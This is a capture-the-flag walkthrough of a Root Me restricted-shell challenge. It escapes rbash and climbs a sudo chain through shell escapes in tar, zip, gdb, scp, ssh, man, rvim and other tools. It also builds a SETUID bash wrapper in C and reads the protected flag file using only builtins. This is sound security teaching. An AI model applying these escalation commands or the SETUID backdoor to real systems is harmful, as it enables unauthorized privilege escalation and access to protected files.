I'm getting serious about CTFs: they are great fun, but I still have a lot to learn.
A good choice to start learning is
Root Me lets us practice on a lot of challenges, classified by category: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.
Let's start with the first category: App - Script.
The seventh challenge we face is: Restricted shells
Vulnerability type:
- Privilege escalation via a weak sudo configuration and SETUID binaries
##################################################
On the challenge's web page, click "Start the challenge" and connect to it by typing:
- ssh -p 2222 app-script-ch14@challenge02.root-me.org
The password is "app-script-ch14".
At the beginning, look at the hint printed on screen about sudo -l. That command will be useful later.
We quickly find that most commands cannot be used and that the .passwd file is readable only by the app-script-ch14-14 user. This is because the current shell is rbash (restricted bash), which forbids cd, changing PATH, running commands whose name contains a slash, and redirecting output, among other things. Administrators who use rbash to restrict standard users usually point PATH at a directory under $HOME that holds only the commands they want to allow.
In this scenario, since I can use almost NOTHING, the first step is to get a real BASH SHELL (goodbye rbash). How can we do this?
After what felt like 100 years, we noticed that echo still works, and since the shell expands globs before echo ever sees them, echo can stand in for ls.
Typing:
- echo *
we get the files in the home directory. Running echo with a glob inside each of these three directories, app-script-ch14-sudoers and step14 show nothing, probably because we lack permission to read them. But if we do the same in the remaining directory:
we see one file, vim.
Vim can run external commands. Launch it by typing vim, then inside vim type:
- :set shell=/bin/bash
- :shell
At this point we are in a BASH SHELL. GOODBYE RBASH!!!!!!!! Setting the shell option first matters: vim runs :shell and :! through its 'shell' option, which defaults to $SHELL, i.e. rbash here, and rbash would refuse to run /bin/bash.
The challenge is ended. The flag is Th3Ch4ll3ng31sN0t3nD3d.
Of course the challenge is not ended.
Let's recap: I'm app-script-ch14, I'm in bash NOW and the challenge is not over. OK.
At least now I should have many more commands available.
If I type a command by its bare name I still get a "command not found" error: the new bash inherited PATH from rbash, which points only at the restricted directory. Either call commands by absolute path (/bin/ls for ls) or, now that we are no longer restricted, reset it with export PATH=/usr/local/bin:/usr/bin:/bin.
I need the privileges of app-script-ch14-14, so I check whether I can run anything as that user with:
- /usr/bin/sudo -l
I get:
Matching Defaults entries for app-script-ch14 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14 may run the following commands on challenge02:
(app-script-ch14-2) NOPASSWD: /usr/bin/python
This means I can run python as app-script-ch14-2 without a password. To execute it as that user, type:
- /usr/bin/sudo -u app-script-ch14-2 /usr/bin/python
Now the Python interpreter runs as app-script-ch14-2, and from Python we can spawn a shell that keeps that identity. In the interpreter, just type:
- >>> import os
- >>> os.system("/bin/bash")
A new shell as the new user opens (and since sudo applies secure_path, PATH is sane again and bare command names work). Now we repeat the same procedure until we reach app-script-ch14-14.
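Since this loop (sudo -l, read off the runas user and the allowed binary, escape, repeat) is done thirteen times, here is an added example, not code from the original post, of a small parser for sudo -l output. It copes with a runas spec that carries a group part "(user : group)", with tags such as NOPASSWD: or NOEXEC:, and with several comma-separated commands on one line. The sample output embedded in it is constructed in the format shown above, not real output from the box.

```shell
#!/usr/bin/env bash
# Added example: parse "sudo -l" output into RUNAS <tab> TAGS <tab> COMMAND
# lines so the next hop of a sudo chain can be read off mechanically.

parse_sudo_l() {
    awk '
        # command lines follow the "may run the following commands" header
        /may run the following commands/ { in_cmds = 1; next }
        in_cmds && /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]+/, "", line)
            if (match(line, /^\([^)]*\)/) == 0) next
            runas = substr(line, 2, RLENGTH - 2)   # strip the parentheses
            sub(/[ \t]*:.*$/, "", runas)           # drop an optional ": group"
            rest = substr(line, RLENGTH + 1)
            sub(/^[ \t]+/, "", rest)
            tags = "-"
            while (match(rest, /^[A-Z_]+:[ \t]*/)) {   # NOPASSWD:, NOEXEC:, ...
                t = substr(rest, 1, RLENGTH)
                sub(/:[ \t]*$/, "", t)
                tags = (tags == "-") ? t : tags "," t
                rest = substr(rest, RLENGTH + 1)
            }
            n = split(rest, cmds, /,[ \t]*/)       # one entry per command
            for (i = 1; i <= n; i++) print runas "\t" tags "\t" cmds[i]
        }
    '
}

# Filter the parsed table down to the commands runnable as a given user.
runnable_as() {
    awk -F'\t' -v u="$1" '$1 == u { print $3 }'
}

# Constructed sample in the format printed by sudo -l on the box (not real output).
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for app-script-ch14 on challenge02:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User app-script-ch14 may run the following commands on challenge02:
    (app-script-ch14-2) NOPASSWD: /usr/bin/python
    (root : root) /bin/tar, /usr/bin/zip
    (app-script-ch14-14) NOPASSWD: /bin/rbash --
EOF
}

# On a real box: sudo -l | parse_sudo_l | runnable_as app-script-ch14-2
sample_sudo_l | parse_sudo_l
```

The awk script uses only POSIX features (match/RLENGTH, sub, split with a regex), so it runs on both gawk and mawk, which matters when the target box only has the minimal one.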
So, typing sudo -l we get:
Matching Defaults entries for app-script-ch14-2 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-2 may run the following commands on challenge02:
(app-script-ch14-3) NOPASSWD: /bin/tar
Type:
- sudo -u app-script-ch14-3 /bin/tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
testfile must be an existing readable file (/dev/null will do); --checkpoint=1 makes tar run the checkpoint action at the very first record, so before any archive is really written we get a shell as app-script-ch14-3 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-3 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-3 may run the following commands on challenge02:
(app-script-ch14-4) NOPASSWD: /usr/bin/zip
Type:
- sudo -u app-script-ch14-4 /usr/bin/zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
/tmp/test must exist (touch it first). -T tests the archive after creating it, using the program given by --unzip-command (short form -TT), which here is our shell. We get a shell as app-script-ch14-4 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-4 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-4 may run the following commands on challenge02:
(app-script-ch14-5) NOPASSWD: /usr/bin/awk
Type:
- sudo -u app-script-ch14-5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'
and we get a shell as app-script-ch14-5 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-5 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-5 may run the following commands on challenge02:
(app-script-ch14-6) NOPASSWD: /usr/bin/gdb
Type:
- sudo -u app-script-ch14-6 /usr/bin/gdb
- (gdb) python import os; os.system('/bin/bash')
and we get a shell as app-script-ch14-6 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-6 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-6 may run the following commands on challenge02:
(app-script-ch14-7) NOPASSWD: /usr/bin/pico
Type:
- sudo -u app-script-ch14-7 /usr/bin/pico -s "/bin/bash"
The editor opens. -s sets the spell-checker program, which pico runs when you press CTRL+T, so type a word (the author typed /bin/bash; any text will do) and press CTRL+T.
We get a shell as app-script-ch14-7 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-7 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-7 may run the following commands on challenge02:
(app-script-ch14-8) NOPASSWD: /usr/bin/scp
scp does not run a command for us directly, but its -S option lets us choose the program used to make the connection, and that program runs as app-script-ch14-8. So we write a script (executed as app-script-ch14-8) that compiles a small C program spawning /bin/bash and marks the binary SETUID. Because the script runs as app-script-ch14-8, the binary is owned by that user, and when our current user executes it, it runs as app-script-ch14-8. This relies on gcc being installed and on /tmp not being mounted nosuid.
First make a directory in /tmp and put the script and program there.
Type:
- mkdir /tmp/shell
- cd /tmp/shell
- chmod 777 .
(The directory must be writable by app-script-ch14-8, who will create the binary in it.)
Inside this folder, create the following C program, shell.c:
#define _GNU_SOURCE        /* setresuid/setresgid are GNU extensions */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

/* Run through the SETUID/SETGID bits, only the effective ids belong to the
 * owner. bash drops privileges when the effective uid differs from the real
 * uid, so make real, effective and saved ids all equal before the exec. */
int main(int argc, char **argv, char **envp)
{
    setresgid(getegid(), getegid(), getegid());
    setresuid(geteuid(), geteuid(), geteuid());
    execve("/bin/bash", argv, envp);
    return 0;
}
Then create the following script, run.sh:
#!/bin/bash
# Runs as the sudo target user, so the binary it produces is owned by that user.
gcc shell.c -o shell
chmod 777 shell
chmod +s shell   # SETUID and SETGID (chmod 4755 would do without leaving it world-writable)
Then, still in /tmp/shell, execute:
- chmod 777 run.sh
- sudo -u app-script-ch14-8 /usr/bin/scp -S ./run.sh 127.0.0.1:/tmp/z.zip ./
scp invokes ./run.sh as its "ssh" program, so the script runs as app-script-ch14-8 (the copy itself fails, which does not matter). It produces the shell binary owned by app-script-ch14-8 with SETUID set, so we can execute it with the owner's privileges.
Type:
- ./shell
and we get a shell as app-script-ch14-8 user.
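The SETUID detour above silently fails in two common situations: when the directory sits on a filesystem mounted nosuid (a tmpfs /tmp is often mounted that way, and the kernel then ignores the bit), and when the rebuilt binary ends up without the bit or without the expected owner. As an added example, not code from the original post, here are pre-flight checks for both. The mounts table inside it is constructed for the demo; on a real box pass /proc/mounts.

```shell
#!/usr/bin/env bash
# Added example: checks before relying on a SETUID helper built in /tmp.

# suid_honoured DIR MOUNTS_FILE
# Picks the longest mount point in a /proc/mounts-style table that is a prefix
# of DIR and reports whether that mount has the nosuid option.
# Exit status 0: SETUID binaries under DIR are honoured; 1: they are not.
suid_honoured() {
    awk -v p="$1" '
        {
            mp = $2; opts = $4
            gsub(/\\040/, " ", mp)           # /proc/mounts escapes spaces as \040
            if (mp == "/" || p == mp || index(p, mp "/") == 1) {
                if (length(mp) > length(best)) { best = mp; bestopts = opts }
            }
        }
        END {
            n = split(bestopts, o, ",")
            for (i = 1; i <= n; i++)
                if (o[i] == "nosuid") { print "nosuid: " best; exit 1 }
            print "suid honoured: " best; exit 0
        }
    ' "$2"
}

# is_setuid FILE: true if the SETUID mode bit is set (the bit itself, not
# whether the kernel will honour it; combine with suid_honoured for that).
is_setuid() {
    [ -u "$1" ]
}

# owner_of FILE: owner name from ls, which reads the same on GNU and BSD
# where stat's flags differ.
owner_of() {
    ls -ld "$1" | awk '{ print $3 }'
}

# preflight TARGET_USER BINARY [MOUNTS]: every condition the escalation relies on.
preflight() {
    local dir
    dir=$(cd "$(dirname "$2")" && pwd) || return 1
    suid_honoured "$dir" "${3:-/proc/mounts}" >/dev/null &&
        is_setuid "$2" &&
        [ "$(owner_of "$2")" = "$1" ]
}

# Constructed mounts table (not from a real box): /tmp is a nosuid tmpfs.
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
/dev/sda2 /challenge ext4 rw,relatime 0 0
EOF
}

# Demo: on this layout /tmp/shell would be useless, the challenge home is fine.
demo() {
    local m
    m=$(mktemp)
    sample_mounts > "$m"
    suid_honoured /tmp/shell "$m" || true
    suid_honoured /challenge/app-script/ch14/step14 "$m" || true
    rm -f "$m"
}
demo
```

If /tmp turns out to be nosuid, pick a directory the target user can write to on a filesystem without that flag (the challenge's own home tree, for example) and point run.sh there; nothing else in the procedure changes.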
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-8 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-8 may run the following commands on challenge02:
(app-script-ch14-9) NOPASSWD: /usr/bin/man
Type:
- sudo -u app-script-ch14-9 /usr/bin/man ls
- !/bin/bash
man shows the page through a pager (less), and ! in the pager runs a shell command, so we get a shell as app-script-ch14-9 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-9 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-9 may run the following commands on challenge02:
(app-script-ch14-10) NOPASSWD: /usr/bin/ssh
Type:
- sudo -u app-script-ch14-10 /usr/bin/ssh -o ProxyCommand="sh -c './run.sh'" 127.0.0.1
ProxyCommand is the program ssh uses to reach the host, so run.sh is executed as app-script-ch14-10 BEFORE any connection is made (run this from /tmp/shell, where shell.c lives). The connection itself then fails with:
Could not create directory '/challenge/app-script/ch14/.ssh'.
ssh_exchange_identification: Connection closed by remote host
but don't worry, our script has already run. It rebuilds the executable, now owned by app-script-ch14-10 with SETUID set, so we can run it with that user's privileges. So, type:
- ./shell
and we get a shell as app-script-ch14-10 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-10 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-10 may run the following commands on challenge02:
(app-script-ch14-11) NOPASSWD: /usr/bin/git
Type:
- sudo -u app-script-ch14-11 /usr/bin/git help status
- !/bin/bash
git help displays the man page through the same pager, so the same ! escape applies, and we get a shell as app-script-ch14-11 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-11 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-11 may run the following commands on challenge02:
(app-script-ch14-12) NOPASSWD: /usr/bin/rvim
This time it is vim again, but the restricted build (rvim): :set shell and :shell, like :! and anything else that reaches an external shell, are disabled.
PYTHON (of course) comes to the rescue! On the Vim version installed here, :python still works in restricted mode, and Python can run Linux commands for us. Type:
- sudo -u app-script-ch14-12 /usr/bin/rvim
- :python import os; os.system('gcc shell.c -o shell && chmod 777 shell && chmod +s shell')
- :q (or :q!)
- ./shell
Run this from /tmp/shell so gcc finds shell.c; the rebuilt binary is now owned by app-script-ch14-12. Inside vim you can also simply use :python import os; os.system('/bin/bash'). Be aware that newer Vim releases disable the scripting interfaces in restricted mode as well, so this escape depends on the installed version.
Either way, we get a shell as app-script-ch14-12 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-12 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-12 may run the following commands on challenge02:
(app-script-ch14-13) NOPASSWD: /usr/bin/script
Type:
- sudo -u app-script-ch14-13 /usr/bin/script
script records a terminal session by starting a new shell ($SHELL, or sh if unset) as the sudo target user, so we land directly in a shell as app-script-ch14-13 user. If the target's SHELL were itself restricted, script -c /bin/bash /dev/null would run bash explicitly instead.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-13 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-13 may run the following commands on challenge02:
(app-script-ch14-14) NOPASSWD: /bin/rbash --
Type:
- sudo -u app-script-ch14-14 /bin/rbash --
and we get a shell as app-script-ch14-14 user.
NOW I AM app-script-ch14-14, as I wanted! What a privilege escalation chain!
Note that we now land in the ~/step14 folder. But there is a problem... Did you notice? To take over app-script-ch14-14 we ran rbash, so we are back in a restricted shell, and this time there is no vim.
Our target is the .passwd file in the $HOME folder. I cannot use ls, but as before I can use echo ./* to see which files are in the current directory. Inside step14 there is one file, ./sl, which I cannot execute, and rbash does not let me cd out of here...
At this point, how can we read a file?
There are several ways; here are two.
The first uses mapfile, which reads a file into a bash array, one element per line (input redirection with < is still allowed in rbash; only output redirection is blocked). Type:
- mapfile ARRAY < ../.passwd
- echo "${ARRAY[@]}"
(echo $ARRAY alone would print only the first line.) The second uses echo together with bash's $(< file) form, which reads the file without running any external command:
- echo "$(< ../.passwd)"
You will get THE FLLLLLLAAAAAAGGGGGGGGGGGGGGGGGGGGGGG!
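As an added example (not code from the original post), here are the echo-as-ls trick from the start of the challenge and the mapfile and $(< file) tricks from this last step, written as small bash functions with a constructed directory layout to try them on. The layout and the flag value in it are made up for the demo.

```shell
#!/usr/bin/env bash
# Added example: the "builtins only" survival kit for rbash. rbash forbids
# commands containing a slash and leaves PATH pointing at a near-empty
# directory, but the shell still expands globs, still allows input
# redirection (<), and still has echo, printf and mapfile.
# Re-exec under bash if started by a plain sh (mapfile and arrays are bash-only).
if [ -z "$BASH_VERSION" ] && [ -r "$0" ]; then exec bash "$0" "$@"; fi

# builtin_ls [DIR]: list entries of DIR (default .) with glob expansion only.
# The second pattern picks up dotfiles such as .passwd without matching . and ..
builtin_ls() {
    local d=${1:-.} f
    for f in "$d"/* "$d"/.[!.]*; do
        [ -e "$f" ] || continue        # the pattern matched nothing
        printf '%s\n' "${f##*/}"
    done
}

# builtin_cat FILE: print a whole file via bash's $(< file) redirection.
builtin_cat() {
    printf '%s\n' "$(< "$1")"
}

# builtin_cat_lines FILE: the mapfile variant, one array element per line,
# so multi-line files come out intact (echo $ARRAY would show line 1 only).
builtin_cat_lines() {
    local -a lines
    mapfile -t lines < "$1"
    printf '%s\n' "${lines[@]}"
}

# Demo on a constructed layout mirroring the challenge home (not real data).
# The setup needs output redirection, so run it from an unrestricted shell;
# the three functions themselves are what you would type inside rbash.
demo() {
    local home
    home=$(mktemp -d)
    mkdir "$home/step14"
    printf 'FLAG{constructed-sample}\n' > "$home/.passwd"
    : > "$home/step14/sl"
    builtin_ls "$home"             # prints step14 then .passwd
    builtin_cat "$home/.passwd"    # prints the constructed flag
    rm -rf "$home"
}
demo
```

Inside a real rbash you would type the bodies directly, e.g. printf '%s\n' ./* and printf '%s\n' "$(< ../.passwd)"; defining functions is allowed too, since it involves neither a slash in a command name nor an output redirection.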
Now I'm off to sleep, zzz...
Useful links:
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/